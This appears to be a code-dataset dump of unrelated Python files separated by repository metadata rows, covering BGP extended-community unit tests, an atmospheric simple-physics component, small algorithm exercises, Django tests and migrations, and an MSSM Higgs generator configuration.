self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_0, '100:12')], ext_community)
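        # Byte layout, for reference: the 8-byte value is a 2-byte type
        # (\x00\x02 = two-octet-AS Route Target), a 2-byte AS number
        # (\x00\x64 = 100) and a 4-byte assigned number
        # (\x00\x00\x00\x0c = 12), hence '100:12'.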
def test_construct_rt0(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_0, '100:12')])
self.assertEqual(b'\xc0\x10\x08\x00\x02\x00\x64\x00\x00\x00\x0c', ext_community)
def test_parse_rt1(self):
# Route Target,Format IPv4 address(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x01\x02\x0a\x0a\x0a\x0a\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_1, '10.10.10.10:12')], ext_community)
def test_construct_rt1(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_1, '10.10.10.10:12')])
self.assertEqual(b'\xc0\x10\x08\x01\x02\x0a\x0a\x0a\x0a\x00\x0c', ext_community)
def test_parse_rt2(self):
# Route Target,Format AS(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x02\x02\x00\x01\x00\x01\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_2, '65537:12')], ext_community)
def test_construct_rt2(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_2, '65537:12')])
self.assertEqual(b'\xc0\x10\x08\x02\x02\x00\x01\x00\x01\x00\x0c', ext_community)
def test_parse_ro0(self):
# Route Origin,Format AS(2bytes):AN(4bytes)
ext_community = ExtCommunity.parse(value=b'\x00\x03\x00\x64\x00\x00\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_0, '100:12')], ext_community)
def test_construct_ro0(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_0, '100:12')])
self.assertEqual(b'\xc0\x10\x08\x00\x03\x00\x64\x00\x00\x00\x0c', ext_community)
def test_parse_ro1(self):
# Route Origin,Format IPv4 address(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x01\x03\x0a\x0a\x0a\x0a\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_1, '10.10.10.10:12')], ext_community)
def test_construct_ro1(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_1, '10.10.10.10:12')])
self.assertEqual(b'\xc0\x10\x08\x01\x03\x0a\x0a\x0a\x0a\x00\x0c', ext_community)
def test_parse_ro2(self):
# Route Origin,Format AS(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x02\x03\x00\x01\x00\x01\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_2, '65537:12')], ext_community)
def test_construct_ro2(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_2, '65537:12')])
self.assertEqual(b'\xc0\x10\x08\x02\x03\x00\x01\x00\x01\x00\x0c', ext_community)
def test_parse_invalid_length(self):
# invalid length
self.assertRaises(excep.UpdateMessageError, ExtCommunity.parse,
b'\x00\x00\x02\x00\x64\x00\x00\x00\x0c')
try:
ExtCommunity.parse(value=b'\x00\x00\x02\x00\x64\x00\x00\x00\x0c')
except excep.UpdateMessageError as e:
self.assertEqual(bgp_cons.ERR_MSG_UPDATE_ATTR_LEN, e.sub_error)
def test_parse_unknow(self):
        # unknown extended community type
hex_tmp = b'\x09\x03\x00\x01\x00\x01\x00\x0c'
ext_community = ExtCommunity.parse(value=hex_tmp)
self.assertEqual(bgp_cons.BGP_EXT_COM_UNKNOW, ext_community[0][0])
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
ff20799864d9ab1630cd84985b26232f955a7bad | 8ed9296cf14cbd48ad6c6ba977a4eddfb6158ec3 | /src/idealised/simple_physics/simple_physics_custom.py | f427bcf74ae3c3f900988a4ea169b9ce6119018d | [
"BSD-3-Clause"
] | permissive | JoyMonteiro/CliMT | 51191c8e44eef28057971dd29de8e40c0bd3ef97 | 0949ed3a3a125638072351d7277ae4b956956d35 | refs/heads/master | 2021-04-09T17:45:56.369908 | 2016-10-28T08:32:26 | 2016-10-28T08:32:26 | 28,734,117 | 2 | 0 | null | 2015-01-03T03:45:23 | 2015-01-03T03:45:22 | null | UTF-8 | Python | false | false | 6,114 | py | import numpy as np
from component import Component
import _simple_physics_custom as phys
from grid import Grid
class simple_physics_custom(Component):
"""
Interface to the simple physics package. This is a modified version which allows the
user to switch off any of the three routines : large scale condensation, surface fluxes,
or boundary layer parameterisation
Reed and Jablonowski 2012:
title = {Idealized tropical cyclone simulations of intermediate complexity: a test case for {AGCMs}}
journal = {Journal of Advances in Modeling Earth Systems}
Instantiation
============
sp = climt.simple_physics(<args>)
where <args> include the following REQUIRED arguments:
Name Dims Meaning Units Default Notes
grid (object) grid generated by by another
component which is used to
get latitudes for calculating
the forcing
dt 0 The (constant) time step to be seconds
used by the physics
Ts 2 The surface temperature to use IF
use_ext_ts is True (= 1)
and the following OPTIONAL arguments (1 indicates True, use 0 for False):
Name Dims Meaning Units Default Notes
cyclone 0 Integer indicating if 1
the physics must simulate
a cyclone. If 0, it
will simulate a moist baroclinic
environment. This option is used
only to generate surface temperatures.
This will be ignored if external
surface temperatures are
prescribed
lsc 0 Integer indicating whether
large scale condensation is active 1
pbl 0 Integer indicating whether 1
boundary layer is active
surf_flux 0 Integer indicating whether 1
surface fluxes are active
use_ext_ts 0 Integer indicating whether 0
surface temperature is externally
specified (else internal default
corresponding to constant value
of 302.15 K is used)
qflux 0 Integer indicating whether surface 1
latent heat fluxes are calculated
momflux 0 Integer indicating whether surface 1
momentum fluxes are calculated
tflux 0 Integer indicating whether surface 1
sensible heat fluxes are calculated
Usage
=====
call instance directly to get increments
inc = sp(<args>)
where <args> are the following REQUIRED arguments:
Name Dims Meaning Units Default Notes
U 3 zonal winds ms-1
V 3 meridional winds ms-1
T 3 temperature K
p 3 atmospheric pressure Pa
pint 3 Pressure at model interfaces Pa
q 3 specific humidity g kg-1
ps 2 surface pressure Pa
* Outputs that are accessible as sp.<Name>
Name Dims Meaning Units Default Notes
Udot 3 zonal wind tendency ms-2
Vdot 3 meridional wind tendency ms-2
Tdot 3 temperature tendency Ks-1
qdot 3 humidity tendency g kg-1
precc 2 precipitation
"""
def __init__(self, **kwargs):
self.Name = 'simple_physics'
self.LevType = 'p'
self.SteppingScheme = 'explicit'
self.ToExtension = ['U', 'V', 'T', 'p', 'pint', 'q', 'ps']
self.Required = ['U', 'V', 'T', 'p', 'pint', 'q', 'ps']
self.FromExtension = ['Uinc', 'Vinc', 'Tinc', 'qinc', 'precc']
self.Prognostic = ['U', 'V', 'T', 'q']
self.Diagnostic = ['precc']
if 'grid' not in kwargs:
kwargs['grid'] = Grid(self,**kwargs)
time_step = 0
if 'dt' not in kwargs:
raise IndexError, '\n\n dt is a required argument'
nlevs = kwargs['grid']['nlev']
nlats = kwargs['grid']['nlat']
nlons = kwargs['grid']['nlon']
time_step = kwargs['dt']
phys.init_simple_physics(1, nlons, nlats, nlevs, time_step, kwargs)
Component.__init__(self,**kwargs)
def driver(self, u, v, temp, p, pint, q, ps, simTime=-1):
'''
Returns the tendencies for a simplified moist physics simulation
'''
latitudes = self.Grid['lat']
nlats = self.Grid['nlat']
nlons = self.Grid['nlon']
lons,lats,levs = u.shape
assert lons == nlons
assert lats == nlats
u_tend = np.zeros(u.shape)
v_tend = np.zeros(v.shape)
t_tend = np.zeros(temp.shape)
q_tend = np.zeros(q.shape)
precip = np.zeros((nlons,nlats))
t_out, u_out, v_out, q_out, precip_out = \
phys.get_tendencies(u, v, temp,
p, pint, q,
ps, latitudes)
return u_out,v_out,t_out,q_out,precip_out
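# Usage sketch following the class docstring above (illustrative values):
#
#     sp = simple_physics_custom(dt=600.)  # 600 s physics time step
#     inc = sp(U=U, V=V, T=T, p=p, pint=pint, q=q, ps=ps)
#
# where the arrays have the shapes listed under "Usage" in the docstring.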
| [
"[email protected]"
] | |
4b642e6a61f839f7027c9f80ffb3381877982af2 | d63c503df093f4a6f2e4f5fa796c4864a4418461 | /subarray.py | 27c8cbb61999db7937c16409f9634e6da000b139 | [] | no_license | 99rishita/Geeksforgeeks | 963e4c9d484cd615e7ffb7f640d712f15cb7ad3e | ece2da9e1a5f39a54de4af4ee13913e67b10745e | refs/heads/master | 2022-12-29T04:28:11.004559 | 2020-10-02T18:24:39 | 2020-10-02T18:24:39 | 277,882,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | def subarraysum(arr, k):
sum = 0
for i in range(0, len(arr)):
sum = arr[i]
#j = i+1
for j in range(i+1, len(arr)):
sum = sum + arr[j]
if sum > k:
break
if sum == k:
print(i+1)
print(j+1)
return
#arr = [1,2,3,7,5]
#k = 12
#arr = [1,2,3,4,5,6,7,8,9,10]
#k = 15
arr = [1, 4, 20, 3, 10, 5]
k = 33
subarraysum(arr, k)
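# For the active case arr = [1, 4, 20, 3, 10, 5], k = 33 the subarray
# arr[2..4] = [20, 3, 10] sums to 33, so this prints the 1-based start and
# end positions 3 and 5 on separate lines.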
| [
"[email protected]"
] | |
edcde8943da6aedbe6d9cb618303471335c58763 | 2da355c3e63d911995bd5661100d858ceeae5493 | /python_data/Chapter 7/P/P-7.45.py | 264f3ee6748288442c770f7725f1dce5236145c1 | [] | no_license | allenxzy/Data-and-Structures-and-Alogrithms | 1f72e7471f7d8f8982985986eda57f896e73087d | 5977ea9434b42032069b24a538f455067ef38283 | refs/heads/master | 2021-01-16T21:46:24.199337 | 2016-12-14T08:05:40 | 2016-12-14T08:05:40 | 60,823,594 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | #-*-coding: utf-8 -*-
"""
An array A is sparse if most of its entries are empty (i.e., None). A list
L can be used to implement such an array efficiently. In particular, for
each nonempty cell A[i], we can store an entry (i,e) in L, where e is the
element stored at A[i]. This approach allows us to represent A using O(m)
storage, where m is the number of nonempty entries in A. Provide such
a SparseArray class that minimally supports methods __getitem__(j) and
__setitem__(j, e) to provide standard indexing operations. Analyze the
efficiency of these methods.
""" | [
"[email protected]"
] | |
92d622b8979f7189633fda47981ae316e0f50bb1 | c4efe9f6416f989524fafb128525a0a71272f680 | /python/python-test.py | a0fc2d56f0ca9636405a5daa8bf9512c4329afe5 | [] | no_license | drautb/sketchbook | dcc6eb586ffe739ee21ab74aa6b045073d38fc6b | 12255fc3cc5c2cbccbc174333c76c339d9846d67 | refs/heads/master | 2023-07-27T10:05:40.737633 | 2023-07-25T19:18:32 | 2023-07-25T19:18:32 | 28,785,534 | 4 | 3 | null | 2023-03-07T03:15:24 | 2015-01-04T20:46:06 | C++ | UTF-8 | Python | false | false | 1,712 | py | """
Determine which elements in each array are not present in the other.
Numbers in array 1 that aren't in array 2:
<num1> <num2> <num3>...
Numbers in array 2 that aren't in array 1:
<num1> <num2> <num3>...
"""
def reconcileHelper(arr_a, arr_b):
in_a_not_b = []
in_b_not_a = []
# Some effort is wasted by subtracting both arrays from eachother.
# Instead, sort both arrays up front, (2 * NlogN) then iterate over them in parallel,
# noting which items are skipped in each array as we go.
arr_a.sort()
arr_b.sort()
a_len = len(arr_a)
b_len = len(arr_b)
arr_a_idx = 0
arr_b_idx = 0
while arr_a_idx < a_len and arr_b_idx < b_len:
# If the current element is in both, move on.
a_val = arr_a[arr_a_idx]
b_val = arr_b[arr_b_idx]
if a_val == b_val:
arr_a_idx += 1
arr_b_idx += 1
continue
# If they're not the same, record the lower one as a difference,
# and increment only that index.
if a_val < b_val:
in_a_not_b.append(a_val)
arr_a_idx += 1
else:
in_b_not_a.append(b_val)
arr_b_idx += 1
# There may have been some numbers left at the end of one of the lists.
# We need to add these to the difference.
if arr_a_idx < a_len:
in_a_not_b += arr_a[arr_a_idx:]
elif arr_b_idx < b_len:
in_b_not_a += arr_b[arr_b_idx:]
print("Numbers in array 1 that aren't in array 2:")
print_array(in_a_not_b)
print("Numbers in array 2 that aren't in array 1:")
print_array(in_b_not_a)
return
def print_array(arr):
for n in arr:
print("%d" % n, end=" ")
print("") | [
"[email protected]"
] | |
cf57d9388cb7e3d352c181533f5217e8ac7d4f9a | 95d73f1daebb98fe6707b999c9763f3b84d418a4 | /cms/tests/mail.py | 1b5281d7451060ae56a54f9cbb7b5364631a6269 | [] | no_license | leotop/django_ukrhim | 8e01e284076878c7691986d5e8d056795d2bb900 | e5a60a79f441ae732350e518f9b71e2724dc010a | refs/heads/master | 2021-01-22T15:51:27.617651 | 2015-01-23T11:00:37 | 2015-01-23T11:00:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | # -*- coding: utf-8 -*-
from cms.api import create_page_user
from cms.test_utils.testcases import CMSTestCase
from cms.utils.mail import mail_page_user_change
from django.core import mail
from django.contrib.auth.models import User
class MailTestCase(CMSTestCase):
def setUp(self):
mail.outbox = [] # reset outbox
def test_mail_page_user_change(self):
user = User.objects.create_superuser("username", "[email protected]", "username")
user = create_page_user(user, user, grant_all=True)
mail_page_user_change(user)
self.assertEqual(len(mail.outbox), 1)
| [
"[email protected]"
] | |
060ffffdae42855cbce9c3ae529ae8e62c711b23 | 8b187f3d60446b39a8f2ba976688ed493798fc64 | /portal/migrations/0007_note.py | 755564f8c5a2e3459cdfe33a6edeb0a0548dbaf1 | [] | no_license | JackSnowdon/JobHunter | 4eb8c5bd2e5cf7c97ca5b29f697e8f95d98a5bb3 | a2c87a6a7b14fd5231b6d99502a638ea702015a4 | refs/heads/master | 2022-12-19T07:27:39.354155 | 2020-10-02T17:32:00 | 2020-10-02T17:32:00 | 297,356,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | # Generated by Django 3.1.1 on 2020-09-25 15:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('portal', '0006_job_last_updated'),
]
operations = [
migrations.CreateModel(
name='Note',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('created_on', models.DateTimeField(auto_now_add=True)),
('job', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='noted', to='portal.job')),
],
),
]
| [
"[email protected]"
] | |
054f5b6be278fe0dba1a08e780741e122cf03e7b | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/ThirteenTeV/MSSM_HiggsToMuMu/fragment_mhmodp_MA200_tb35_bbH.py | cdf690cfcd661d342bf12d8168bd138c8e77a780 | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 16,464 | py | COM_ENERGY = 13000.0 # GeV
CROSS_SECTION = 1 # pb
PROCESS = 'HiggsBSM:gg2H2bbbar = on'
SLHA_TABLE = """BLOCK SPINFO
1 FeynHiggs
2 2.12.0
2 built on ott 13, 2016
BLOCK MODSEL
1 0 # Model
2 1 # GridPts
3 0 # Content
4 0 # RPV
5 0 # CPV
6 0 # FV
BLOCK SMINPUTS
1 1.28952828E+02 # invAlfaMZ
2 1.16637000E-05 # GF
3 1.19000000E-01 # AlfasMZ
4 9.11876000E+01 # MZ
5 4.16000000E+00 # Mb
6 1.73200000E+02 # Mt
7 1.77703000E+00 # Mtau
11 5.10998902E-04 # Me
13 1.05658357E-01 # Mmu
21 6.00000000E-03 # Md
22 3.00000000E-03 # Mu
23 9.50000000E-02 # Ms
24 1.28600000E+00 # Mc
BLOCK MINPAR
3 3.50000000E+01 # TB
BLOCK EXTPAR
0 0.00000000E+00 # Q
1 9.54716519E+01 # M1
2 2.00000000E+02 # M2
3 1.50000000E+03 # M3
11 1.50571429E+03 # At
12 1.50571429E+03 # Ab
13 1.50571429E+03 # Atau
23 2.00000000E+02 # MUE
25 3.50000000E+01 # TB
26 2.00000000E+02 # MA0
27 2.15554723E+02 # MHp
31 5.00000000E+02 # MSL(1)
32 5.00000000E+02 # MSL(2)
33 1.00000000E+03 # MSL(3)
34 5.00000000E+02 # MSE(1)
35 5.00000000E+02 # MSE(2)
36 1.00000000E+03 # MSE(3)
41 1.50000000E+03 # MSQ(1)
42 1.50000000E+03 # MSQ(2)
43 1.00000000E+03 # MSQ(3)
44 1.50000000E+03 # MSU(1)
45 1.50000000E+03 # MSU(2)
46 1.00000000E+03 # MSU(3)
47 1.50000000E+03 # MSD(1)
48 1.50000000E+03 # MSD(2)
49 1.00000000E+03 # MSD(3)
BLOCK MASS
1000012 4.95831819E+02 # MSf(1,1,1)
1000011 5.02297238E+02 # MSf(1,2,1)
2000011 5.01844888E+02 # MSf(2,2,1)
1000002 1.49902682E+03 # MSf(1,3,1)
2000002 1.49958921E+03 # MSf(2,3,1)
1000001 1.50117796E+03 # MSf(1,4,1)
2000001 1.50020517E+03 # MSf(2,4,1)
1000014 4.95831819E+02 # MSf(1,1,2)
1000013 5.02841028E+02 # MSf(1,2,2)
2000013 5.01300040E+02 # MSf(2,2,2)
1000004 1.49902736E+03 # MSf(1,3,2)
2000004 1.49958977E+03 # MSf(2,3,2)
1000003 1.50122273E+03 # MSf(1,4,2)
2000003 1.50016037E+03 # MSf(2,4,2)
1000016 9.97922438E+02 # MSf(1,1,3)
1000015 9.96148789E+02 # MSf(1,2,3)
2000015 1.00590492E+03 # MSf(2,2,3)
1000006 8.76425392E+02 # MSf(1,3,3)
2000006 1.13477936E+03 # MSf(2,3,3)
1000005 9.90691930E+02 # MSf(1,4,3)
2000005 1.01129043E+03 # MSf(2,4,3)
25 1.25061212E+02 # Mh0
35 2.00246931E+02 # MHH
36 2.00000000E+02 # MA0
37 2.18628426E+02 # MHp
1000022 8.84634445E+01 # MNeu(1)
1000023 1.52251009E+02 # MNeu(2)
1000025 -2.10570836E+02 # MNeu(3)
1000035 2.65328034E+02 # MNeu(4)
1000024 1.49028243E+02 # MCha(1)
1000037 2.65929050E+02 # MCha(2)
1000021 1.50000000E+03 # MGl
BLOCK DMASS
0 1.73200000E+02 # Q
25 7.35389733E-01 # Delta Mh0
35 7.56649161E-03 # Delta MHH
36 0.00000000E+00 # Delta MA0
37 2.79510476E-01 # Delta MHp
BLOCK NMIX
1 1 9.33994702E-01 # ZNeu(1,1)
1 2 -1.09656980E-01 # ZNeu(1,2)
1 3 3.08336463E-01 # ZNeu(1,3)
1 4 -1.43380155E-01 # ZNeu(1,4)
2 1 -3.12041908E-01 # ZNeu(2,1)
2 2 -6.93332183E-01 # ZNeu(2,2)
2 3 5.13911163E-01 # ZNeu(2,3)
2 4 -3.97260177E-01 # ZNeu(2,4)
3 1 9.78754166E-02 # ZNeu(3,1)
3 2 -1.36323085E-01 # ZNeu(3,2)
3 3 -6.77823330E-01 # ZNeu(3,3)
3 4 -7.15815585E-01 # ZNeu(3,4)
4 1 -1.43889355E-01 # ZNeu(4,1)
4 2 6.99057828E-01 # ZNeu(4,2)
4 3 4.25886693E-01 # ZNeu(4,3)
4 4 -5.56088600E-01 # ZNeu(4,4)
BLOCK UMIX
1 1 -6.05777723E-01 # UCha(1,1)
1 2 7.95633930E-01 # UCha(1,2)
2 1 7.95633930E-01 # UCha(2,1)
2 2 6.05777723E-01 # UCha(2,2)
BLOCK VMIX
1 1 -7.95633930E-01 # VCha(1,1)
1 2 6.05777723E-01 # VCha(1,2)
2 1 6.05777723E-01 # VCha(2,1)
2 2 7.95633930E-01 # VCha(2,2)
BLOCK STAUMIX
1 1 6.98837569E-01 # USf(1,1)
1 2 7.15280401E-01 # USf(1,2)
2 1 7.15280401E-01 # USf(2,1)
2 2 -6.98837569E-01 # USf(2,2)
BLOCK STOPMIX
1 1 7.08253316E-01 # USf(1,1)
1 2 -7.05958385E-01 # USf(1,2)
2 1 7.05958385E-01 # USf(2,1)
2 2 7.08253316E-01 # USf(2,2)
BLOCK SBOTMIX
1 1 6.81625021E-01 # USf(1,1)
1 2 7.31701667E-01 # USf(1,2)
2 1 7.31701667E-01 # USf(2,1)
2 2 -6.81625021E-01 # USf(2,2)
BLOCK ALPHA
-6.23852387E-02 # Alpha
BLOCK DALPHA
9.33262428E-04 # Delta Alpha
BLOCK HMIX Q= -0.99900000E+03
1 2.00000000E+02 # MUE
2 3.50000000E+01 # TB
BLOCK MSOFT Q= 0.00000000E+00
1 9.54716519E+01 # M1
2 2.00000000E+02 # M2
3 1.50000000E+03 # M3
31 5.00000000E+02 # MSL(1)
32 5.00000000E+02 # MSL(2)
33 1.00000000E+03 # MSL(3)
34 5.00000000E+02 # MSE(1)
35 5.00000000E+02 # MSE(2)
36 1.00000000E+03 # MSE(3)
41 1.50000000E+03 # MSQ(1)
42 1.50000000E+03 # MSQ(2)
43 1.00000000E+03 # MSQ(3)
44 1.50000000E+03 # MSU(1)
45 1.50000000E+03 # MSU(2)
46 1.00000000E+03 # MSU(3)
47 1.50000000E+03 # MSD(1)
48 1.50000000E+03 # MSD(2)
49 1.00000000E+03 # MSD(3)
BLOCK AE Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.50571429E+03 # Af(3,3)
BLOCK AU Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.50571429E+03 # Af(3,3)
BLOCK AD Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.50571429E+03 # Af(3,3)
BLOCK YE Q= 0.00000000E+00
1 1 1.02767518E-04 # Yf(1,1)
2 2 2.12490616E-02 # Yf(2,2)
3 3 3.57380343E-01 # Yf(3,3)
BLOCK YU Q= 0.00000000E+00
1 1 1.72380888E-05 # Yf(1,1)
2 2 7.38939405E-03 # Yf(2,2)
3 3 9.95212324E-01 # Yf(3,3)
BLOCK YD Q= 0.00000000E+00
1 1 1.16496188E-03 # Yf(1,1)
2 2 1.84438794E-02 # Yf(2,2)
3 3 7.52835453E-01 # Yf(3,3)
BLOCK VCKMIN
1 2.25300000E-01 # lambda
2 8.08000000E-01 # A
3 1.32000000E-01 # rhobar
4 3.41000000E-01 # etabar
BLOCK MSL2 Q= 0.00000000E+00
1 1 2.50000000E+05 # MSL2(1,1)
2 2 2.50000000E+05 # MSL2(2,2)
3 3 1.00000000E+06 # MSL2(3,3)
BLOCK MSE2 Q= 0.00000000E+00
1 1 2.50000000E+05 # MSE2(1,1)
2 2 2.50000000E+05 # MSE2(2,2)
3 3 1.00000000E+06 # MSE2(3,3)
BLOCK MSQ2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSQ2(1,1)
2 2 2.25000000E+06 # MSQ2(2,2)
3 3 1.00000000E+06 # MSQ2(3,3)
BLOCK MSU2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSU2(1,1)
2 2 2.25000000E+06 # MSU2(2,2)
3 3 1.00000000E+06 # MSU2(3,3)
BLOCK MSD2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSD2(1,1)
2 2 2.25000000E+06 # MSD2(2,2)
3 3 1.00000000E+06 # MSD2(3,3)
BLOCK TE Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 5.38112689E+02 # Tf(3,3)
BLOCK TU Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 1.49850541E+03 # Tf(3,3)
BLOCK TD Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 1.13355510E+03 # Tf(3,3)
BLOCK SELMIX
1 1 9.99968990E-01 # UASf(1,1)
1 4 -7.87520591E-03 # UASf(1,4)
2 2 8.04210562E-01 # UASf(2,2)
2 5 -5.94344489E-01 # UASf(2,5)
3 3 6.98837569E-01 # UASf(3,3)
3 6 7.15280401E-01 # UASf(3,6)
4 1 7.87520591E-03 # UASf(4,1)
4 4 9.99968990E-01 # UASf(4,4)
5 2 5.94344489E-01 # UASf(5,2)
5 5 8.04210562E-01 # UASf(5,5)
6 3 7.15280401E-01 # UASf(6,3)
6 6 -6.98837569E-01 # UASf(6,6)
BLOCK USQMIX
1 1 1.00000000E+00 # UASf(1,1)
1 4 1.01654749E-05 # UASf(1,4)
2 2 9.99990506E-01 # UASf(2,2)
2 5 4.35747613E-03 # UASf(2,5)
3 3 7.08253316E-01 # UASf(3,3)
3 6 -7.05958385E-01 # UASf(3,6)
4 1 -1.01654749E-05 # UASf(4,1)
4 4 1.00000000E+00 # UASf(4,4)
5 2 -4.35747613E-03 # UASf(5,2)
5 5 9.99990506E-01 # UASf(5,5)
6 3 7.05958385E-01 # UASf(6,3)
6 6 7.08253316E-01 # UASf(6,6)
BLOCK DSQMIX
1 1 9.99903542E-01 # UASf(1,1)
1 4 -1.38891136E-02 # UASf(1,4)
2 2 9.78606924E-01 # UASf(2,2)
2 5 -2.05738883E-01 # UASf(2,5)
3 3 6.81625021E-01 # UASf(3,3)
3 6 7.31701667E-01 # UASf(3,6)
4 1 1.38891136E-02 # UASf(4,1)
4 4 9.99903542E-01 # UASf(4,4)
5 2 2.05738883E-01 # UASf(5,2)
5 5 9.78606924E-01 # UASf(5,5)
6 3 7.31701667E-01 # UASf(6,3)
6 6 -6.81625021E-01 # UASf(6,6)
BLOCK CVHMIX
1 1 9.99821551E-01 # UH(1,1)
1 2 1.88908885E-02 # UH(1,2)
1 3 0.00000000E+00 # UH(1,3)
2 1 -1.88908885E-02 # UH(2,1)
2 2 9.99821551E-01 # UH(2,2)
2 3 0.00000000E+00 # UH(2,3)
3 1 0.00000000E+00 # UH(3,1)
3 2 0.00000000E+00 # UH(3,2)
3 3 1.00000000E+00 # UH(3,3)
DECAY 25 1.16552325E-02 # Gamma(h0)
8.01722713E-04 2 22 22 # BR(h0 -> photon photon)
5.08826303E-04 2 22 23 # BR(h0 -> photon Z)
9.26595393E-03 2 23 23 # BR(h0 -> Z Z)
7.64511047E-02 2 -24 24 # BR(h0 -> W W)
2.19751651E-02 2 21 21 # BR(h0 -> gluon gluon)
8.18598960E-09 2 -11 11 # BR(h0 -> Electron electron)
3.64127353E-04 2 -13 13 # BR(h0 -> Muon muon)
1.02887205E-01 2 -15 15 # BR(h0 -> Tau tau)
6.89943016E-08 2 -2 2 # BR(h0 -> Up up)
9.55645326E-03 2 -4 4 # BR(h0 -> Charm charm)
1.25397048E-06 2 -1 1 # BR(h0 -> Down down)
3.14893481E-04 2 -3 3 # BR(h0 -> Strange strange)
7.77873217E-01 2 -5 5 # BR(h0 -> Bottom bottom)
DECAY 35 3.64820560E+00 # Gamma(HH)
-5.23846484E-07 2 22 22 # BR(HH -> photon photon)
-1.36982069E-07 2 22 23 # BR(HH -> photon Z)
-1.17507948E-04 2 23 23 # BR(HH -> Z Z)
-3.33880523E-04 2 -24 24 # BR(HH -> W W)
-5.51449801E-04 2 21 21 # BR(HH -> gluon gluon)
-1.10734452E-08 2 -11 11 # BR(HH -> Electron electron)
4.92636635E-04 2 -13 13 # BR(HH -> Muon muon)
-1.37311113E-01 2 -15 15 # BR(HH -> Tau tau)
-1.10499925E-12 2 -2 2 # BR(HH -> Up up)
-1.52979382E-07 2 -4 4 # BR(HH -> Charm charm)
-1.47299048E-06 2 -1 1 # BR(HH -> Down down)
-3.69878672E-04 2 -3 3 # BR(HH -> Strange strange)
-8.59288730E-01 2 -5 5 # BR(HH -> Bottom bottom)
-1.53250511E-03 2 1000022 1000022 # BR(HH -> neutralino1 neutralino1)
DECAY 36 3.66917725E+00 # Gamma(A0)
1.33971863E-07 2 22 22 # BR(A0 -> photon photon)
1.56816424E-07 2 22 23 # BR(A0 -> photon Z)
5.39627034E-04 2 21 21 # BR(A0 -> gluon gluon)
1.10021728E-08 2 -11 11 # BR(A0 -> Electron electron)
4.89466254E-04 2 -13 13 # BR(A0 -> Muon muon)
1.36454069E-01 2 -15 15 # BR(A0 -> Tau tau)
1.93510652E-13 2 -2 2 # BR(A0 -> Up up)
2.73412113E-08 2 -4 4 # BR(A0 -> Charm charm)
1.46372732E-06 2 -1 1 # BR(A0 -> Down down)
3.67552741E-04 2 -3 3 # BR(A0 -> Strange strange)
8.54600619E-01 2 -5 5 # BR(A0 -> Bottom bottom)
7.54613892E-03 2 1000022 1000022 # BR(A0 -> neutralino1 neutralino1)
7.34310308E-07 2 23 25 # BR(A0 -> Z h0)
DECAY 37 1.00298403E+00 # Gamma(Hp)
4.41935516E-08 2 -11 12 # BR(Hp -> Electron nu_e)
1.88941115E-03 2 -13 14 # BR(Hp -> Muon nu_mu)
5.34381118E-01 2 -15 16 # BR(Hp -> Tau nu_tau)
5.40534775E-06 2 -1 2 # BR(Hp -> Down up)
6.09130051E-05 2 -3 2 # BR(Hp -> Strange up)
3.37162440E-05 2 -5 2 # BR(Hp -> Bottom up)
2.48603840E-07 2 -1 4 # BR(Hp -> Down charm)
1.35263410E-03 2 -3 4 # BR(Hp -> Strange charm)
4.72115497E-03 2 -5 4 # BR(Hp -> Bottom charm)
9.01746986E-08 2 -1 6 # BR(Hp -> Down top)
2.23192733E-06 2 -3 6 # BR(Hp -> Strange top)
4.57401227E-01 2 -5 6 # BR(Hp -> Bottom top)
1.46474571E-04 2 24 25 # BR(Hp -> W h0)
2.57627491E-06 2 24 35 # BR(Hp -> W HH)
2.75456132E-06 2 24 36 # BR(Hp -> W A0)
